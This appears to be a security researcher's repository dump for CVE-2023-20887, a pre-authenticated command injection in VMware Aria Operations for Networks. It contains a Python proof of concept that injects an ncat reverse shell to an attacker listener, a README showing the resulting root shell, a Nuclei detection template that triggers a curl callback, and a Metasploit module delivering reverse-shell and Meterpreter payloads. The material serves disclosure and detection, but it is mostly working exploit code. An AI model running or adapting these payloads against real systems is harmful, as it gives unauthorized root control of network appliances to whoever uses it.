[
  {
    "path": "CVE-2023-20887.py",
    "content": "\"\"\"\nVMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE\nVersion: 6.8.0.1666364233\nExploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)\nA root cause analysis of the vulnerability can be found on my blog:\nhttps://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nimport requests\nfrom threading import Thread\nimport argparse\nfrom telnetlib import Telnet\nimport socket\nrequests.packages.urllib3.disable_warnings()\n\n\n\nargparser = argparse.ArgumentParser()\nargparser.add_argument(\"--url\", help=\"VRNI URL\", required=True)\nargparser.add_argument(\"--attacker\", help=\"Attacker listening IP:PORT (example: 192.168.1.10:1337)\", required=True)\n\nargs = argparser.parse_args()\n\n\n\n\ndef handler():\n    print(\"(*) Starting handler\")\n    t = Telnet()\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.bind((args.attacker.split(\":\")[0],int(args.attacker.split(\":\")[1])))\n    s.listen(1)\n    conn, addr= s.accept()\n    print(f\"(+) Received connection from {addr[0]}\")\n    t.sock = conn\n    print(\"(+) pop thy shell! (it's ready)\")\n    t.interact()\n\ndef start_handler():\n    t = Thread(target=handler)\n    t.daemon = True\n    t.start()\n\n\ndef exploit():\n    url = args.url + \"/saas./resttosaasservlet\"\n    revshell = f'ncat {args.attacker.split(\":\")[0]} {args.attacker.split(\":\")[1]} -e /bin/sh'\n    payload = \"\"\"[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`\"\"\"+revshell+\"\"\"`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\"\"\"\n    result = requests.post(url, headers={\"Content-Type\":\"application/x-thrift\"}, verify=False, data=payload)\n\nprint(\"VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)\")\nstart_handler()\nexploit()\n\ntry:\n    while True:\n        pass\nexcept KeyboardInterrupt:\n    print(\"(*) Exiting...\")\n    exit(0)"
  },
  {
    "path": "README.md",
    "content": "# CVE-2023-20887\nPOC for CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE\n\n## Technical Analysis\nA root cause analysis of the vulnerability can be found on my blog:\nhttps://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/\n\n![poc](poc.gif)\n\n\n## Summary\nVMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.\na malicious actor can get remote code execution in the context of 'root' on the appliance.\nVMWare 6.x version are vulnerable.\n\n\n\n## Usage\n```plaintext\npython CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337\nVMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)\n(*) Starting handler\n(+) Received connection from 192.168.116.100\n(+) pop thy shell! (it's ready)\nsudo bash\nid\nuid=0(root) gid=0(root) groups=0(root)\nhostname\nvrni-platform-release\n```\n\n## Mitigations\nUpdate to the latest version or mitigate by following the instructions within the Progress Advisory\n* https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n\n## Follow Us on Twitter for the latest security research:\n*  [SinSinology](https://twitter.com/SinSinology)\n*  [SummoningTeam](https://twitter.com/SummoningTeam)\n\n## Disclaimer\nThis software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.\n\n"
  },
  {
    "path": "nuclei-CVE-2023-20887.yaml",
    "content": "id: vmware-vrni-rce\n\ninfo:\n  name: VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE (cve-2023-20887)\n  author: sinsinology\n  severity: high\n  description: |\n    VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.\n    a malicious actor can get remote code execution in the context of 'root' on the appliance.\n    VMWare 6.x version are vulnerable.\n  reference:\n    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n    - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/\n  metadata:\n    max-request: 2\n    verified: true\n    shodan-query: title:\"VMware vRealize Network Insight\"\n    fofa-query: title=\"VMware vRealize Network Insight\"\n  tags: vmware,rce,msf\n\n\nhttp:\n  - raw:\n      - |-\n        POST /saas./resttosaasservlet HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-thrift\n\n        [1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`curl {{interactsh-url}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: body\n        words:\n          - 'createSupportBundle'\n\n      - type: status\n        status:\n          - 200\n"
  },
  {
    "path": "vmware_vrni_rce_cve_2023_20887.rb",
    "content": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE',\n        'Description' => %q{\n          VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.\n          a malicious actor can get remote code execution in the context of 'root' on the appliance.\n          VMWare 6.x version are vulnerable.\n\n          This module exploits the vulnerability to upload and execute payloads gaining root privileges.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'Sina Kheirkhah', # Metasploit Module (@SinSinology) of Summoning Team (@SummoningTeam) on twitter\n        ],\n        'References' => [\n            ['CVE', 'CVE-2023-20887'],\n            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0012.html'],\n            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/'],\n        ],\n        'DisclosureDate' => '2023-06-07',\n        'Platform' => ['unix', 'linux'],\n        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n        'Privileged' => true,\n        'Targets' => [\n          [\n            'Unix (In-Memory)',\n            {\n              'Platform' => 'unix',\n              'Arch' => ARCH_CMD,\n              'Type' => :in_memory,\n              'DefaultOptions' => {\n                'PAYLOAD' => 'cmd/unix/reverse_bash'\n              }\n            }\n          ],\n          [\n            'Linux Dropper',\n            {\n              'Platform' => 'linux',\n              'Arch' => [ARCH_X64],\n              'Type' => :linux_dropper,\n              'CmdStagerFlavor' => [ 'curl', 'printf' ],\n              'DefaultOptions' => {\n                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n              }\n            }\n          ]\n        ],\n        'DefaultTarget' => 0,\n        'DefaultOptions' => {\n          'RPORT' => 443,\n          'SSL' => true\n        },\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n        }\n      )\n    )\n  end\n\n  def check_vrni\n    return send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path, '/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.8.0/locales/en-GB/components/UI?pseudo=false')\n    })\n  rescue StandardError => e\n    elog(\"#{peer} - Communication error occurred: #{e.message}\", error: e)\n    fail_with(Failure::Unknown, \"Communication error occurred: #{e.message}\")\n  end\n\n  def execute_command(cmd, _opts = {})\n    print_status(\"pop thy shell!!!\")\n    pop_thy_shell = \"[1,\\\"createSupportBundle\\\",1,0,{\\\"1\\\":{\\\"str\\\":\\\"1111\\\"},\\\"2\\\":{\\\"str\\\":\\\"`sudo #{cmd}`\\\"},\\\"3\\\":{\\\"str\\\":\\\"value3\\\"},\\\"4\\\":{\\\"lst\\\":[\\\"str\\\",2,\\\"AAAA\\\",\\\"BBBB\\\"]}}]\"\n\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path,'/saas./resttosaasservlet'),\n      'ctype' => 'application/x-thrift',\n      'headers' => {\n        'Accept' => 'application/json, text/plain, */*'\n      },\n      'encode_params' => false,\n      'data'     => pop_thy_shell\n     })\n\n  rescue StandardError => e\n    elog(\"#{peer} - Communication error occurred: #{e.message}\", error: e)\n    fail_with(Failure::Unknown, \"Communication error occurred: #{e.message}\")\n  end\n\n  # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string\n  # that indicates the target is running VMWare Aria Operations for Networks (vRealize Network Insight)\n  def check\n    print_status(\"Checking if #{peer} can be exploited.\")\n    res = check_vrni\n    return CheckCode::Unknown('No response received from the target!') unless res\n\n    body = res.get_json_document\n    if body.nil? || body['data']['productName'] != 'vRNIUI'\n      return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).')\n    end\n\n    return CheckCode::Vulnerable if body['data']['productName'] == \"6.8.0\"\n\n    CheckCode::Appears('Target is running VMWare Aria Operations for Networks (vRealize Network Insight).')\n  end\n\n  def exploit\n    case target['Type']\n    when :in_memory\n      print_status(\"Executing #{target.name} with #{payload.encoded}\")\n      execute_command(payload.encoded)\n    when :linux_dropper\n      print_status(\"Executing #{target.name}\")\n      execute_cmdstager\n    end\n  end\nend\n"
  }
]